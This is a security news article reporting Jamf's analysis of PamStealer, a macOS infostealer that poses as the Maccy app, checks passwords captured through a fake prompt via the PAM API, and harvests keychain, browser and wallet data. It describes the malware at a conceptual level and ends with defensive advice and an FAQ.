Internet Voices

New macOS Malware PamStealer Exploits PAM to Steal Passwords

A new information-stealing malware, "PamStealer," targeting macOS has been discovered. Written in Rust, it exploits PAM interfaces and disguises itself as a legitimate application to verify and steal passwords using sophisticated techniques.

6 min read Reviewed & edited by the SINGULISM Editorial Team

New macOS Malware PamStealer Exploits PAM to Steal Passwords
Photo by FlyD on Unsplash

A new information-stealing malware targeting macOS, named “PamStealer,” has been discovered. Researchers at the security company Jamf identified this malware, which employs advanced techniques to exploit the Pluggable Authentication Modules (PAM) interface in macOS. It verifies and steals the target’s login credentials while disguising itself as the legitimate clipboard management app “Maccy,” distributed via a disk image (DMG).

As highlighted in the report “Discovery of PamStealer, New Information-Stealing Malware Targeting macOS,” this malware is far more sophisticated in its stealth and detection avoidance methods than previous macOS-targeting information stealers. Below, we delve into the technical details and security implications of this threat.

Dual-Stage Delivery Method

PamStealer’s infection process involves a two-stage mechanism. In the first stage, it is distributed as a disk image (DMG) masquerading as the legitimate macOS clipboard management app “Maccy.” This DMG contains code compiled as AppleScript, with the primary function being to download and execute the second-stage payload.

AppleScript is macOS’s native scripting language, widely used for system operations and application control. The attackers leverage AppleScript to convince users they are installing a legitimate application while deploying Rust-based code in the background. The second stage contains the main malware responsible for information theft. Since this code is written in Rust, it complicates analysis and signature-based detection.

This two-stage mechanism is considered effective for bypassing static analysis and file scanning by security products, compared to traditional malware that operates as a single binary. The lightweight first stage is less likely to be flagged as suspicious, while the second stage is downloaded dynamically, increasing the likelihood of evading initial file inspections.

Enhanced Stealth Through PAM Exploitation

The name “PamStealer” originates from its exploitation of PAM (Pluggable Authentication Modules), a standard authentication framework in macOS. PAM allows various applications and system services to perform consistent authentication procedures.

The malware displays a native password prompt on the target device, presenting messages such as “Maccy wants to make changes. Enter your password to allow this.” Carefully designed to mimic system authentication dialogs, it tricks users into entering their passwords, which the malware verifies locally using the PAM API.

According to Jamf’s analysis, this local verification through PAM is fundamentally different from the methods employed by traditional macOS information-stealing malware, which typically invoke external commands (e.g., dscl, security, osascript) to validate passwords. These external calls generate process chains that are easier for security monitoring tools to detect. By directly accessing the PAM API, PamStealer avoids leaving traces of process generation. As Jamf explains, “This is a quieter routine that retains only verified passwords while eliminating one detectable process chain for defenders.”

If password verification fails, PamStealer repeatedly presents the same prompt until the correct password is entered. Once the correct password is obtained, it displays a fake error message stating, “The file is corrupted and cannot be installed,” likely to prevent the target from becoming suspicious.

Theft Targets and Disguising Techniques

Beyond stealing passwords, PamStealer employs multiple tactics to exfiltrate as much information as possible. One such tactic involves prompting the target to grant full disk access to the fake Maccy app. If the target approves, the malware gains access to the entire file system, enabling it to harvest data from the keychain, saved browser passwords, documents, cookie files, and cryptocurrency wallet-related information.

Additionally, it has been confirmed that the malware contains code designed to access Ethereum accounts. The targeting of private keys and seed phrases for cryptocurrency wallets aligns with a growing trend among macOS-targeting malware observed in recent years.

Security Implications

The methods used by PamStealer highlight challenges in macOS security monitoring. In particular, password verification via direct calls to the PAM API falls outside the attack patterns anticipated by traditional endpoint protection products. Many security solutions focus on monitoring behaviors like process generation, file writes, and network communications, but authentication via PAM may be treated as part of normal system operations.

The use of AppleScript as the first stage also exploits macOS-specific attack vectors. Since AppleScript is commonly used for automation and management tasks, it is less likely to be flagged as malicious by security tools. The distribution method via DMG files further bypasses browser download protections and Gatekeeper, as it relies on users manually mounting the disk image.

It is still unclear how widespread this malware has become, but its technical sophistication underscores the evolving nature of threats targeting macOS. Security teams at organizations are advised to enhance monitoring of macOS endpoints, focusing not only on file-based detection but also on identifying malicious behavior and abnormal API calls through PAM and AppleScript.

As reported in “Microsoft Defender’s Privilege Escalation Vulnerability ‘RoguePlanet’ Released,” attacks exploiting standard OS functionalities and APIs are on the rise. To counteract such threats, security measures must shift from relying solely on known malware signatures to incorporating behavioral detection and monitoring of suspicious API access.

Editorial Opinion

The discovery of PamStealer highlights the growing security challenges faced by macOS as it confronts a new wave of threats. In the short term, we might see Apple introducing changes to PAM API or AppleScript functionalities, or security vendors like Jamf implementing dedicated rules to monitor PAM calls. Additionally, macOS users should be vigilant about installers disguised as legitimate apps and heed warnings from security advisories.

From a long-term perspective, as macOS continues to expand its user base among both individuals and enterprises, its attack surface as a platform increases. Techniques like PamStealer’s direct exploitation of macOS’s standard authentication infrastructure pose detection challenges for traditional antivirus solutions and could accelerate the transition to next-generation endpoint protection based on dynamic analysis and behavioral monitoring. Furthermore, the increasing prevalence of Rust-based malware may further complicate efforts to analyze and combat such threats.

Our editorial team is closely monitoring whether PamStealer will become a widespread threat or remain confined to targeted attacks.

References

Frequently Asked Questions

How does PamStealer infect macOS?
It tries to infect by distributing a disk image (DMG) disguised as the legitimate clipboard management app "Maccy" and prompting users to mount it. When users execute files within the disk image, the first-stage payload uses AppleScript to download and execute the Rust-based second-stage payload.
What are the advantages of exploiting PAM?
Traditional malware typically invokes external commands (such as dscl or osascript) for password verification, which generates process chains that are easier for security tools to detect. By directly using the PAM API, PamStealer avoids leaving traces of process generation, making it harder for security products to identify.
How can users protect themselves against PamStealer?
Avoid installing applications from untrusted sources, especially those requesting system-level permissions like clipboard managers. Only download software from official websites or the App Store. Ensure endpoint protection products include behavioral detection capabilities, and immediately deny suspicious password prompts.
Source: Slashdot

Comments

← Back to Home